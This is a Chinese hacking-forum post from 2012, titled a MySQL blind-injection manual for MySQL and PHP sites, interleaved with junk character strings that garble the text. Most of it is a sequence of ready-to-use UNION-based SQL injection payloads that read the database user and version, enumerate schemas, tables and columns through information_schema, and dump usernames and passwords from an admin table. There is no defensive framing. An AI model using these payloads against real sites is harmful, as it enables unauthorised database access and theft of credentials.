找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2117|回复: 0
打印 上一主题 下一主题

mysql盲注手册

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:27:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
* E9 N8 u" N' o! F. ~
教程内容:Mysql 5+php 注入
. @. i# ?  t5 A: ?' u' s1 e/ u3 f6 o7 D  c1 ?  r
5 T8 w1 A9 B2 r: |6 j

  `/ B; c0 k, p# Y: v! Z一.查看MYSQL基本信息(库名,版本,用户)
4 i0 l/ P8 G" ^
( G3 m! k# K' _+ Y  b+ D' H% qand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
! l/ W# i) k4 J) ~! \
( l) Q4 j& w/ T' N' N7 x0 Y: o二.查数据库' b5 \0 V0 ?. g# y9 R

$ W8 K1 E6 i- u3 W; u6 h. r4 land 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*7 c9 ]5 U- U: v4 A+ x7 Y1 J6 P
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
" ^9 Q* j0 D' s, H
% ~0 _; Q2 @; P( K0 C6 E4 l$ A三.暴表. L6 o8 `. \* B- K2 z" ^

( o+ K( R: d  I6 P* sand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*4 Y6 B+ ^3 E0 R/ y& `  F
9 R  F+ j1 m9 R
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
# d+ I" B4 R5 B+ c
, m  l5 g# J9 c6 R3 S四.暴字段" j* Z6 @( H+ r8 |1 ?  c5 D4 s
/ d. U) v, ]5 k2 I' a. k
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*3 }/ X. J( ^. d+ ^7 b8 H

  K8 a, j4 ?+ rlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。; }6 |! R$ z, G) D6 x

! b) W: I- V1 E: W  T. S五.暴数据# q# z) j& C4 C; I, ?5 A4 X

0 B) L, E  h) G* [' rand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
) t  N3 G& p: z; [' s/ Y9 F7 g( ^, C# l2 u3 w

0 p8 }7 T4 Q) }- n; n7 J这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
+ d" F% f1 C! W" E# k* z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表